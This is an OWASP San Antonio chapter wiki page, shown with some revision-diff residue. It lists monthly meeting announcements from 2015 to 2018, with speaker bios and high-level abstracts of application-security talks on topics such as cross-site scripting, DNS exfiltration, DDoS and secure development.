Dan Cornell has over ten years of experience architecting, developing and securing web-based software systems. As a Principal of Denim Group, he leads the organization’s technology team overseeing methodology development and project execution for Denim Group’s customers. He also heads the Denim Group application security research team, investigating the application of secure coding and development techniques to the improvement of web based software development methodologies. He is also the primary author of sprajax, Denim Group’s open source tool for assessing the security of AJAX-enabled web applications.
 
  
 +
2:45 - 3:45: Making Security as Agile as Development: Adding DevOps and TDD to your security program, Matt Tesauro, Application Security Leader, Pearson
  
 +
Software and application development are not slowing down. Is your AppSec program able to keep pace? With agile development, continuous deployment, DevOps, and Cloud the pace of change in the software industry has only increased. As as AppSec professional, you face rapidly delivered services while making sure they are built reliably and securely. When you are deploying multiple times a day, there is no time to fit in your traditional week long security assessment.
  
----
+
In this talk will cover how Matt has put these practices in place at Pearson after doing similar work at Rackspace. What are the key ways to keep your AppSec program agile enough to keep up with the pace of change today. Methods will be discussed for securing infrastructure, apps, APIs and source code. Even if you are not in the DevOps, CI/CD world today, you will be soon enough. Its time to embrace the change and say "Challenge Accepted".
  
'''Previous News'''
+
About Matt:
The slide deck from OWASP San Antonio June 2010 meeting available online here:  
+
Matt Tesauro is the Application Security Lead Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace.  He is also an Adjunct Professor for the University of Texas Computer Science department teaching the next generation of CS students about Application Security.  Matt is broadly experienced information security professional of 15 years specializing in application and cloud security. He has also presented and provided trainings at various international industry events including DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at Texas A&M University. He is a former board member of the OWASP Foundation and project lead for OWASP WTE project, a collection of application security testing tools.  He holds two degrees from A&M University and several security and Linux certifications.
http://www.owasp.org/images/2/24/OWASPSanAntonio06162010_DDFA_PresentationFinal.pdf
 
  
The slide deck from OWASP San Antonio May 2010 meeting available online here: http://www.owasp.org/images/b/b9/OpenSAMM10_OWASPSanAntonio_20100519.pdf
+
3:45 - 4:00: Close
  
The slide deck from OWASP San Antonio March 2010 meeting available online here:
 
http://www.owasp.org/index.php?title=File:Protecting_the_Enterprise_-_Software_Backdoors.pptx&oldid=80140#filelinks
 
  
The slide deck from OWASP San Antonio January 2010 meeting available online here: 
 
http://www.owasp.org/index.php/File:San_Antonio_Chapter-OWASP_WTE_Jan-2010.pdf#filelinks
 
  
The slide deck from OWASP San Antonio October 2008 meeting available online here:
+
'''OWASP San Antonio Chapter - Feb 11  2015 @ 11:30am '''
http://www.owasp.org/index.php/San_Antonio
 
  
The slide deck from OWASP San Antonio September 2007 meeting available online here:
+
Come to the first OWASP San Antonio meeting of 2015. We will be having a talk on BeEF - the Browser Exploitation Framework Project and discussing plans for the rest of 2015.
[[Image:fortify-bjenkins-AppSecStrategy-20070906.pdf]].
 
  
The slide deck from OWASP San Antonio March 2007 meeting will be available online shortly
+
Speaker: Charles Neill
  
The slide deck from OWASP San Antonio September 2006 meeting available online here:
+
Bio: Charles is a Security Developer at Rackspace, where he does application security for products developed in-house, as well as OpenStack projects and other third-party products. He also develops tools to assist with security testing.
[[Image:OWASPSanAntonio_2006_09_AgileAndSecure.pdf]].
 
  
The slide deck from OWASP San Antonio August 2006 meeting available online here:
+
Title: Introduction to Cross-Site Scripting with BeEF
[[Image:OWASPSanAntonio_2006_08_SingleSignOn.ppt]].
 
  
The slide deck from OWASP San Antonio June 2006 meeting available online here: [[Image:OWASPSanAntonio_2006_06_Crypto_Content.pdf]].
+
Abstract:
  
The slide deck from OWASP San Antonio May 2006 meeting available online here: [[Image:OWASPSanAntonio_2006_05_ForcefulBrowsing_Content.pdf]].
+
Cross-site scripting is a well-known attack vector at this point, but many people still don't understand the full risk of being vulnerable to it. BeEF is a framework that combines lots of different tools that can be useful to an attacker after finding a cross-site scripting bug in a site. The purpose of this talk is to demonstrate the potential severity of a cross-site scripting attack, leveraging BeEF to trick the user in various ways and to try to get as much useful information out of them as possible.
  
The slide deck from OWASP San Antonio September 2004 meeting available online here:
+
The slides download link: https://www.owasp.org/images/e/e1/Xss-owasp.pptx
[[Image:OWASPSanAntonio_20040922.pdf]].
 
  
 +
== Past Events  ==
 +
https://www.owasp.org/index.php/San_Antonio/pastEvents
  
 +
[[Category:OWASP Chapter]]
 +
[[Category:United States]]
 
[[Category:Texas]]
 
[[Category:Texas]]

Latest revision as of 12:35, 29 October 2018

OWASP San Antonio

Welcome to the San Antonio chapter homepage. The chapter leadership team is:

Dan Cornell Matt Valdes Michael Xin


Participation

OWASP Foundation (Overview Slides) is a professional association of global members and is open to anyone interested in learning more about software security. Local chapters are run independently and guided by the Chapter_Leader_Handbook. As a 501(c)(3) non-profit professional association your support and sponsorship of any meeting venue and/or refreshments is tax-deductible. Financial contributions should only be made online using the authorized online chapter donation button. To be a SPEAKER at ANY OWASP Chapter in the world simply review the speaker agreement and then contact the local chapter leader with details of what OWASP PROJECT, independent research or related software security topic you would like to present on.

Sponsorship/Membership

Btn donate SM.gif to this chapter or become a local chapter supporter. Or consider the value of Individual, Corporate, or Academic Supporter membership. Ready to become a member? Join Now BlueIcon.JPG


Local News

Please see https://www.meetup.com/OWASP-San-Antonio/ for the most up to date chapter meeting schedule

OWASP San Antonio - November 9, 2018 @ 11:30am

Join us for the November 2018 OWASP San Antonio meeting!

We will have an interesting talk covering strategies and benefits of application tracing!

Title:

Tracing your system for fun and profit

Abstract:

How many of us go in every day knowing the ins and outs of our application but not fully understanding how interacts within the greater system flow? How often do we get called up at night from a frantic developer three dependencies away from our application yelling about a response that they did not expect due to a bug fix we put in a few weeks earlier? As developers, that happens more often than we care to admit. Having something that shows an entire system workflow is monumental. On top of that, security professionals would also benefit from understanding how different parts of the system interact with each other.

There have been many ways to solve this problem (design documents, architecture designs, workflow system documents, etc.) but most uses require manual updates and dedicated resources that know the entire system flow to understand what to update. This is not (usually) scalable.

Tracing cross-boundary systems looks to help solve these issues. In this talk, we’ll talk about one way of tracing a system end-to-end (OpenTracing) and will talk about benefits to security professionals, look at implementation details, talk about other competing products in this space, and next steps in the ecosystem. The goal for this talk is for the attendees to leave with a rudimentary understanding of system tracing and potential benefits and drawbacks

Speaker: Dimitry Ushakov

Bio:

Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and developers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - October 5, 2018 @ 11:30am

Join us for the October 2018 OWASP San Antonio meeting where we will have a talk covering the latest in DDoS attack tools and services!

Title:

Weapons of Mass Disruption

Abstract:

We now live in a world where individuals or groups of individuals hold the same destructive power that only nation states once held. For as little as a couple of dollars an hour, fortune 500 companies and even nation states have been wiped off the Internet. The emergence of professional DDoS services is changing the threat landscape of the Internet once again. We'll take a look at DDoS tools and services and what we can do to combat them.

Speaker: Roman Lara

Bio:

Roman Lara is a Senior Engineer on Rackspace’s specialized DDoS Team and has been a Racker in various roles since 2009. He is responsible for driving the design, build, and maintenance of Rackspace's DDoS Mitigation infrastructure and services. Roman is a high-energy, hands-on leader who’s knowledge and experience of threat trends help develop and create powerful mitigation strategies through Fanatical Support. He earned a degree in Business from the University of Texas in San Antonio.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

The slide link: https://www.slideshare.net/michaelxin2015/weapons-of-mass-disruption-by-roman-lara-for-owasp-san-antonio-chapter-meetup

OWASP San Antonio - June 29, 2018 @ 11:30am

Join us for the June 2018 OWASP San Antonio meeting where we will have a talk covering how to evaluate threats to IoT devices and their related systems!

Title:

Threat Modeling for IoT Systems

Abstract:

The Internet of Things (IoT) is an exciting and emerging area of technology allowing individuals and businesses to make radical changes to how they live their lives and conduct commerce. The challenge with this trend is that IoT devices are just computers with sensors running applications. Because IoT devices interact with our personal lives the proliferation of these devices exposes an unprecedented amount of personal sensitive data to significant risk. In addition, IoT security is not only about the code running on the device. These IoT devices are connected to systems that include supporting web services as well as other client applications that allow for management and reporting.

A critical step to understanding the security of any system is building a threat model. This helps to enumerate the components of the system as well as the paths that data takes as it flows through the system. Combining this information with an understanding of trust boundaries helps provide system designers with critical information to mitigate systemic risks to the technology and architecture. This presentation looks at how Threat Modeling can be applied to IoT systems to help build more security systems during the design process, as well as how to use Threat Modeling when testing the security of IoT systems.

Speaker: Dan Cornell

Bio:

A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - March 30, 2018 @ 11:30am

Join us for the March 2018 OWASP San Antonio meeting!

We will have a talk covering methods and techniques used when attacking authentication in web apps.

Title:

Attacking Authentication in Web Applications Abstract:

Broken authentication is an ongoing issue, identified in the OWASP Top 10 2013 and 2017 (A2 in both). While broken authentication can span multiple topics, this presentation focuses mainly on attacking single factor authentication using usernames and passwords. Methods and techniques will be discussed to perform reconnaissance, username enumeration, account lockout bypass, and various password attacks against web applications. Speaker: Jake Miller

Bio:

Jake is a penetration tester for Blue Canopy (Jacobs Engineering Group), primarily focusing on web application security. Prior to penetration testing, he was a Security Controls Assessor, a SOC analyst, and a Navy Submariner. He blogs about security on https://laconicwolf.com, writes a fair amount of Python and PowerShell code on https://github.com/laconicwolf, and occasionally tweets (@laconicwolf). Aside from security and coding, he enjoys spending time with his family and participating in ultra-running and obstacle races.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - February 23, 2018 @ 11:30am

Join us for the February 2018 OWASP San Antonio meeting!

We will have a talk covering the complexities of secrets management and how one enterprise met the challenge​.

Title: Hashicorp Vault in the Enterprise​

Abstract:

As established enterprises move to embrace automation, securing the secrets that are required for applications to run presents challenges. How can automation be introduced to legacy application deployment models? What capabilities are needed to support modern application architectures? This presentation will review some of the discoveries made while researching these challenges from an enterprise perspective and describe at a high level how HashiCorp Vault can be a way to address them.

Speaker: Mike Thurmond

Bio:

Mike Thurmond is an Information Security Architect at H-E-B. Mike has 15+ years of experience developing, deploying and managing security tools and practices in large enterprises. His experience includes developing and managing authentication systems, developing customized security services, developing and running compliance programs, and integrating security into an agile development SDLC.

Location: Denim Group Offices: 1354 N Loop 1604 E Suite 110, San Antonio, TX 78232

OWASP San Antonio - January 26, 2018 @ 11:30am

Join us for the January 2018 OWASP San Antonio meeting!

We will have a great talk about heap-related attacks and prevention methods​.

Speaker: Tongping Liu

Bio:

Tongping Liu is an Assistant Professor at the University of Texas at San Antonio. He got his Ph.D. from the University of Massachusetts Amherst in 2014. His research spans runtime systems, operating systems, programming languages, compiler, and distributed systems. His primary research goal is to practically improve the performance, reliability and security of parallel software. His work appeared in most prestigious system conferences, such as SOSP, OSDI, EuroSys, and CCS. He has been awarded 2015 Google Faculty Research Award and Mozilla Research Grant.

Title:

​FreeGuard: A Faster Secure Heap Allocator​

Abstract:

In spite of years of improvements to software security, heap-related attacks still remain a severe threat. One reason is that many existing memory allocators fall short in a variety of aspects. For instance, performance-oriented allocators are designed with very limited countermeasures against attacks, but secure allocators generally suffer from significant performance overhead, e.g., running up to 10x slower.

This ​talk will introduce FreeGuard, a secure memory allocator that prevents or reduces a wide range of heap-related security attacks, such as heap overflows, heap over-reads, use-after-frees, as well as double and invalid frees. FreeGuard has similar performance to the default Linux allocator, with less than 2% overhead on average, but provides significant improvement to security guarantees.

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

OWASP San Antonio - November 17, 2017 @ 11:30am

Join us for the November 2017 OWASP San Antonio meeting!

We will have a great talk about optimizing AppSec programs with instrumentation and sensors.

Speaker: Girish Nair

Bio: Girish Nair has been a software developer for more than two decades. He has special interest in web related technologies and application security. He has a Master’s degree in computer science, and is a CISSP. He currently works for Contrast Security, where he evangelizes their technology.

Title: Using Instrumentation and Sensors to drive Optimization in your Application Security Program

Abstract: In our physical world, we have instrumentation all around us. Clocks tell us time, kitchen ovens tell us temperature, cars tell us speed and fuel level, and even have onboard health diagnostics. At our homes, we have security alerts when someone trespasses our property or opens a door. However, in the world of software, we have very little visibility into what is going on inside the software. Our presenters will describe how instrumentation can be used to enable your software applications to both detect vulnerabilities and block attacks. Furthermore, they will demonstrate the insights offered by using instrumentation and why this approach can offer unique insights to your security program.

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

OWASP San Antonio - October 27, 2017 @ 11:30am

Join us for the October 2017 OWASP San Antonio meeting!

We will have a talk about DNS Exfiltration Techniques and Methods.

Speaker: Nolan Berry

Bio: Nolan has been working at Rackspace for close to 5 years focusing on linux and has a strong passion for security. He is on the DNS Engineering team and has spoken at various conferences and places about DNS exfiltration and botnet control structures.

Title: DNS Exfiltration Techniques and Methods

Abstract: This presentation will show various methods of DNS exfiltration to move data out of networks and into networks with varying levels of detectability and talk about why DNS presents a monitoring and security issue to modern systems engineers looking to secure their infrastructure. We will discuss how to detect, but also how to execute this from a red team.

@Denim Group 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

OWASP San Antonio - September 29, 2017 @ 11:30am

Join us for the September 2017 OWASP San Antonio meeting!

We will have a talk about how billion dollar enterprises manage application security at scale.

Speaker: Brandon Triance-Haldane

Bio: Brandon Triance-Haldane is a Solution Architect at Security Compass; he has been delivering high quality solutions to his clients for more than six years. Brandon holds a bachelor's degree in English literature as well as an advanced diploma in Computer Security & Investigations. In his spare time, Brandon likes making music, writing code, and following the Toronto Blue Jays.

Title: How Billion Dollar Enterprises Manage Application Security at Scale

Abstract: Security Compass recently completed a comprehensive research study by surveying companies across multiple industries with the goal of discovering how large, complex organizations address application security at scale. The majority of respondents surveyed were multinational organizations who reported annual earnings greater than $1 billion USD. Through this new research study, we have gleamed novel insights on how large organizations manage application security at scale. Through this presentation, we will reveal aggregated insights, industry trends, and best practices that illuminate how organizations are addressing application security at scale, so that you may apply and compare these learnings to the state of application security at your own organization.

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232


OWASP San Antonio - August 25, 2017 @ 11:30am

Join us for the August 2017 OWASP San Antonio meeting!

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk about Serverless Security!

Speaker: Geva Solomonovich, COO Snyk

Title: Serverless Security: What’s Left To Protect?

Abstract: Serverless means handing off server management to the cloud platforms – along with their security risks. With the “pros” ensuring our servers are patched, what’s left for application owners to protect? As it turns out, quite a lot. This talk discusses the aspects of security serverless doesn’t solve, the problems it could make worse, and the tools and practices you can use to keep yourself safe.


OWASP San Antonio - July 21, 2017 @ 11:30am

Join us for the July 2017 OWASP San Antonio meeting!

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk comparing the internet to the US Interstate System, and what this means to the future of information security.

Speaker: Damon Small

Bio: Damon Small began his career studying music at Louisiana State University. Pursuing the changing job market, he took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid-1990s. Over the past 16 years as a security professional he has supported InfoSec initiatives in the healthcare, defense, aerospace, and oil and gas industries. In addition to his Bachelor of Arts in Music, Damon completed the Master of Science in Information Assurance degree from Norwich University in 2005. His role as Technical Director includes working closely with NCC Group consultants and clients in delivering complex security assessments that meet varied business requirements.

Title: Connections: Eisenhower and the Internet

Abstract : The speaker researches the history of one large, government-funded infrastructure and compares it to another. Specifically, the Eisenhower Interstate System and the Internet. "Connections: Eisenhower and the Internet" explores what the logistical challenges of moving vehicles across the Country can teach us about cybersecurity. Although these two topics seem unrelated, the speaker will take the audience on a journey that begins with early 20th century road-building projects, travels through ARPANET and the commercialization of the Internet, and arrives at current-day cyberspace. These two massive infrastructures have changed the world, and there are important lessons that the former can teach about the latter. The presentation concludes with predictions about the future of the Information Superhighway and how information security professionals can prepare.


OWASP San Antonio - June 30, 2017 @ 11:30am

Join us for the June 2017 OWASP San Antonio meeting!

@Denim Group Offices 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk about testing infrastructure code.

Speaker: Dimitry Ushakov

Bio: Dimitry Ushakov is a Quality Engineer at Rackspace. When not dealing with impostor syndrome from working with geniuses every day, he works on making operators' and deveopers' lives easier with test automation, continuous integration/delivery management, and other testing industry buzzwords.

Title: Testing Infrastructure Code

Abstract: Whether you subscribe to TDD or like to write all your tests after all the development's complete, we can all agree that testing application code is a great idea. While we do a very good job in validating that our application works, we rarely give as much love to our infrastructure code. Infrastructure testing allows us to validate the hardware, software dependencies, and system configurations will work when deploying to a target environment without actual need for deployment (most of the time).

In this talk, we'll define what we mean by infrastructure as code and infrastructure testing. We’ll use the ecosystem one of the major players in this area, Chef, to take a look at the tooling available to properly unit, static analysis, integration test, and compliance/security test our infrastructure.

In the second part of the talk, we'll work through a demo application, applying that tooling to build a truly CI/CD pipeline.


OWASP San Antonio - May 26, 2017 @ 11:30am

Join us for the May 2017 OWASP San Antonio meeting!

Denim Group 1354 N Loop 1604 E Suite 110 San Antonio, TX 78232

We will have a talk about adding security to your software procurement process.

Speaker: Kevin Dunn

Bio: Kevin Dunn is Senior Vice President for Consultancy for NCC Group. Kevin has been a professional security consultant for over 15 years, working on diverse projects and challenging technologies for the world’s largest and most demanding companies. His current responsibilities include delivering security consultancy while managing a talented highly technical team of Pentesters. Kevin works closely with Fortune 100 companies, covering Oil & Gas, Finance and Software sectors, developing strategic security assessment and advisory services for NCC Group brands from his office base of operations in Austin, TX. Over his career, he has worked on lots of physical penetration tests, site audits, and design or implementation projects for physical security.

Title: It Was Broken When It Got Here! Security in your Software Procurement Process

Abstract: In 2017, Software Security is reasonably well understood. Thanks to the hard work of organizations like MITRE, OWASP, BSIMM, Microsoft, OpenSAMM and others, we have moved to a much better software security landscape when compared to 10+ years ago. Of course vulnerabilities still exist, and are found with regularity, but these are typically addressed quickly and competently by the big software vendors. For example a new critical vulnerability in Windows will be fixed by Microsoft and patched efficiently in most enterprises in a matter of days to weeks. Most recently Google managed to fix an OAUTH vuln being exploited in a mass-phishing exercise in a matter of hours! But what about everything else you install in your company or use as a service? Not all product vendors have the same level of understanding or approach to security, and not all software is under the constant scrutiny of an operating system or widespread authentication mechanism.

As organizations we buy and install lots of third party software, ranging from desktop applications through to entire platforms or appliances. Who is checking that software is free of simple vulnerabilities? This issue of security for Commercial Off-The-Shelf (COTS) software, or Free and Open Source Software (FOSS), is often a complicated one. In this talk, we'll look at some case-studies of vulnerabilities found during penetration tests that were then used to forge compromises of companies. In each case, the flaws discovered and exploited had been within the products for a significant amount of time, providing a potential backdoor into the company's internal network or data.

The session will culminate in advice and guidance for how to ensure that security is not an after-thought when purchasing new enterprise products for your company.


OWASP San Antonio - January 27, 2017 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the January 2017 OWASP San Antonio meeting!


We will have a talk about integrating Security into DevOps pipelines through the use of attack surface monitoring.


Speakers: Dan Cornell


Bios: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.


Title: Monitoring Application Attack Surface to Integrate Security into DevOps Pipelines


Abstract: A web application’s attack surface is the combination of URLs it will respond to as well as the inputs to those URLs that can change the behavior of the application. Understanding an application’s attack surface is critical to being able to provide sufficient security test coverage, and by watching an application’s attack surface change over time security and development teams can help target and optimize testing activities.

This presentation looks at methods of calculating web application attack surface and tracking the evolution of attack surface over time. In addition, it looks at metrics and thresholds that can be used to craft policies for integrating different testing activities into Continuous Integration / Continuous Delivery (CI/CD) pipelines for teams integrating security into their DevOps practices.


https://www.meetup.com/OWASP-San-Antonio/events/236883708/


OWASP San Antonio - August 26, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the June OWASP San Antonio meeting!


We will have a talk about Automated DNS Data Exfiltration and Mitigation .


Speakers: Nolan Berry, Towne Besel, Cory Schwartz


Bios: Nolan Berry is a Linux Systems Engineer on the Network Operations DNS Infrastructure team at Rackspace.

Towne Besel is a Security Engineer on the Network Operations DDoS Team at Rackspace.

Cory Schwartz is a Linux Operations Engineer on the Rackspace Cloud Storage Team.


Title: Automated DNS Data Exfiltration and Mitigation


Abstract: Come and learn about DNS based data exfiltration and see it in action. We will show you how a few simple scripts we wrote can steal data from a secure network almost without detection using obfuscated DNS lookups. We will cover the concepts, perform a live demo, and show you how to detect this type of malicious activity.

http://www.meetup.com/OWASP-San-Antonio/events/233427790/


OWASP San Antonio - June 23, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the June OWASP San Antonio meeting!


Note: New date is Thursday, June 23.


We will have a talk about source-assisted web application penetration testing.


Speaker: Dan Cornell


Bio: A globally recognized application security expert, Dan Cornell holds over 15 years of experience architecting, developing and securing web-based software systems. As the Chief Technology Officer and a Principal at Denim Group, Ltd., he leads the technology team to help Fortune 500 companies and government organizations integrate security throughout the development process. He is also the original creator of ThreadFix, Denim Group's industry leading application vulnerability management platform.


Title: The ABCs of Source-Assisted Web Application Penetration Testing With OWASP ZAP: Attack Surface, Backdoors, and Configuration


Abstract: There are a number of reasons to use source code to assist in web application penetration testing such as making better use of penetration testers’ time, providing penetration testers with deeper insight into system behavior, and highlighting specific sections of code so development teams can remediate vulnerabilities faster. Examples of these are provided using the open source ThreadFix plugin for the OWASP ZAP proxy and dynamic application security testing tool. These show opportunities attendees have to enhance their own penetration tests given access to source code.

This presentation covers the “ABCs” of source code assisted web application penetration testing: covering issues of attack surface enumeration, backdoor identification, and configuration issue discovery. Having access to the source lets an attacker enumerate all of the URLs and parameters an application exposes – essentially its attack surface. Knowing these allows pen testers greater application coverage during testing. In addition, access to source code can help to identify potential backdoors that have been intentionally added to the system. Comparing the results of blind spidering to a full attack surface model can identify items of interest such as hidden admin consoles or secret backdoor parameters. Finally, the presentation examines how access to source code can help identify configuration settings that may have an adverse impact on the security of the deployed application.


http://www.meetup.com/OWASP-San-Antonio/events/231594503/


OWASP San Antonio - May 20, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the May OWASP San Antonio meeting!


Note: New date is Friday, May 20 to avoid Memorial Day conflicts.


We will have a talk about Runtime Application Self-Protection (RASP).


Speaker: Kunal Anand

Bio: Kunal is the co-founder and CTO of Prevoty, a next-generation application security platform. Prior to that, he was the Director of Technology at the BBC Worldwide, overseeing engineering and operations across the company’s global Digital Entertainment and Gaming initiatives. Kunal also has several years of experience leading security, data and engineering at Gravity, MySpace and NASA’s Jet Propulsion Laboratory. His work has been featured in Wired Magazine and Fast Company. He continues to develop the patented security technologies that power Prevoty’s core products. Kunal received a B.S. from Babson College.

Title: Runtime Application Self-Protection (RASP) Tools

Abstract: Kunal will be discussing Runtime Application Self-Protection (RASP) and a new high-performance methodology called language theoretic security (LANGSEC). Kunal will also break down how lexers, tokenizers and parsers work, and construct an open source toolchain to analyze data and explore interactive data visualizations -- covering the challenges of modern AppSec along the way.

http://www.meetup.com/OWASP-San-Antonio/events/231044053/


OWASP San Antonio - April 29, 2016 @ 11:30am


Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the April OWASP San Antonio meeting! We will have a talk about AppSec Pipelines!


Speaker: Matt Tesauro

Bio: Matt Tesauro is the a founder and CTO of Infinitiv, a Senior Software Security Engineer at Pearson and was previously the Senior Product Security Engineer at Rackspace. He is also an Adjunct Professor for the University of Texas Computer Science department teaching the next generation of CS students about Application Security. Matt is broadly experienced information security professional of 15 years specializing in application and cloud security. He has also presented and provided trainings at various international industry events including DHS Software Assurance Workshop, OpenStack Summit, SANS AppSec Summit, AppSec US, EU and LATAM. His work has included security consulting, penetration testing, threat modeling, code reviews, training and teaching at the University of Texas and Texas A&M University. He is a former board member of the OWASP Foundation and project lead for OWASP AppSec Pipeline & WTE projects. WTE is a collection of application security testing tools. He holds two degrees from Texas A&M University and several security and Linux certifications.

Title: Taking AppSec to 11: AppSec Pipelines, DevOps and Making Things Better

Abstract:How many applications are in your company’s portfolio? What’s the headcount for your AppSec team? Whatever your situation is, I am sure the numbers are not in your favor. Its not time to find a new career, it's time to up your game. This talk will cover how to take your small merry band of AppSec professionals and scale it up to a virtual army. By taking the best of DevOps, Agile and CI/CD, you can iteratively up your AppSec game over time and begin your ascent out of the security hole you are in.

The talk covers real world experiences running AppSec groups at two different companies. Rackspace with approximately 4,000+ employees and Pearson with 40,000+. Both have an international presence and far more apps and developers that AppSec staff. The talk covers the key principles to speed and scale up AppSec programs using an AppSec Pipeline as well as practical examples of these practices put into use. Start early and begin to buy down the technical security dept which feels inevitable with more traditional AppSec program thinking.


OWASP San Antonio - March 25 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the March OWASP San Antonio meeting! We will have a talk about giving tech talks!


Speaker: Major Hayden


Bio: Major Hayden started at Rackspace in 2006 as a Linux support technician. Over the years, he has worked in support, software development, operations, and information security roles. Major currently works with the OpenStack Private Cloud team with a focus on operations and information security. He blogs frequently on major.io and has been known use Twitter from time to time.

Title: Taming the Technical Talk

Abstract: Many technical people inevitably find themselves up against the most terrifying challenge of their careers: giving a technical talk. Talking in front of large groups of people is never easy, but it can transform the future of software projects or the careers of individuals. This nerve-wracking career catalyst can be tamed, however, through careful planning and thoughtful delivery.

During this talk, we will embark on a journey to overcome our fears and deliver high quality technical talks to small or large groups. We will cover everything from the early stages, such as choosing a topic, all the way to the day of talk itself.

http://www.meetup.com/OWASP-San-Antonio/events/228893612/


OWASP San Antonio - February 26 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the February OWASP San Antonio meeting! We will have a talk about Automated API testing!


Speaker: Matt Valdes


Bio: Matt Valdes is a Security Developer in Test on the Security and Quality Engineering team at Rackspace. Throughout his career, he has been involved in all aspects of the SDLC and is passionate about security testing, process engineering and automation.


Title: Automating Security Tests for APIs


Abstract:RESTful APIs are an increasingly common attack vector for applications. Despite this ever-present threat, open source and commercial vendor support for automatic API security scanners remains limited. With the rate at which APIs are developed, enhanced and deployed, this lack of security test automation creates a gap that at its best limits adoption, and at its worst may leave an application open to attack. To fill the gap in security testing efficiency, members of the Rackspace Quality Engineering and Security Engineering teams worked together to create an Open Source, automated API security scanner.

Syntribos is a flexible, automated scanner that provides configurable test coverage for any HTTP API. Learn how Syntribos enables you to test HTTP APIs in an automated way, helping to detect and eliminate common security vulnerabilities such as SQL injection, command injection, denial of service attacks, and more.

https://github.com/openstack/syntribos


OWASP San Antonio - January 29 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the first OWASP San Antonio meeting of 2016! We will have a talk about XPath Attacks!


Speaker: Luis Torres


Bio: Luis Torres is a security consultant with VerSprite. An avid pen tester, researcher, CTF participant, and bug bounty winner - Luis is a key consultant for VerSprite's AppSec Consulting practice where he focuses his time on client-server, cloud, web services, and fat client security testing. His recent research has been around more damaging exploits around XPath injection which he seeks to share with you today.


Title: XPath Awakens - Attacks & Impact Around XPath Injection


Abstract: XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses XML. Threat agent goals are often aim to circumvent authentication and/or access information in an unauthorized manner.


Developers today use XPaths to perform actions over XML based documents, however insecure coding practices could lead allow for injection issues to surface in web applications. Blind XPath Injection retrieves information by making true/false interrogations with web applications, however they mostly focus on retrieving current query information, skipping sensitive information on XML nodes outside of current query requests. This presentation will extend beyond these blind injection attacks and discuss how to retrieve the entire XML document, using Blind XPath Injection techniques.


OWASP San Antonio - September 18 @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the September 2015 OWASP San Antonio meeting! We will have a talk about detecting security breaches!


Speaker: Josh Sokol


Bio: Josh Sokol, CISSP, graduated from the University of Texas at Austin with a BS in Computer Science in 2002. Since that time, he has worked for several large companies, including AMD and BearingPoint, spent some time as a military contractor, and is currently employed as the Information Security Program Owner at National Instruments. In his current role, Sokol manages all compliance, security architecture, risk management, and vulnerability management activities for NI. Sokol created the free and open source risk management tool named SimpleRisk, has spoken on dozens of security topics including the much-hyped "HTTPSCan Byte Me" talk at Black Hat 2010, and currently serves on the OWASP Global Board of Directors.

Title: The Fox is in the Henhouse: Detecting a Breach Before the Damage is Done

Abstract: Your firewall is a sieve with more holes poked in it than your Grandmother's pin cushion, your IPS doesn't know a breach from a hole in the ground, and your signature-based anti-virus can't keep up with the ever changing tide of malware being hurled at you from every direction. It's time to take a deep breath and admit to ourselves that the traditional methods of keeping the bad guys out of our networks have failed us. Just over two years ago, we began focusing much of our efforts on incident detection and response. Rather than sinking our precious time and money into tools that would become obsolete before the next BlackHat, we decided to take the time to analyze our networks and got creative with different ways to find the systems that have been compromised that those other technologies couldn't detect. In this presentation, we will walk you through the analytics we are running, the tools that we are using, and the techniques that we employ to find and remediate the bad guys from our networks. Good security doesn't have to break the bank; it just has to break the mold.


OWASP San Antonio - August 28th @ 11:30am

Denim Group 1354 N Loop 1604 E Ste 110, San Antonio, TX


Join us for the August 2015 OWASP San Antonio meeting! We will have a talk about building, sniffing and breaking Zigbee (IoT).


Speaker: David Lister

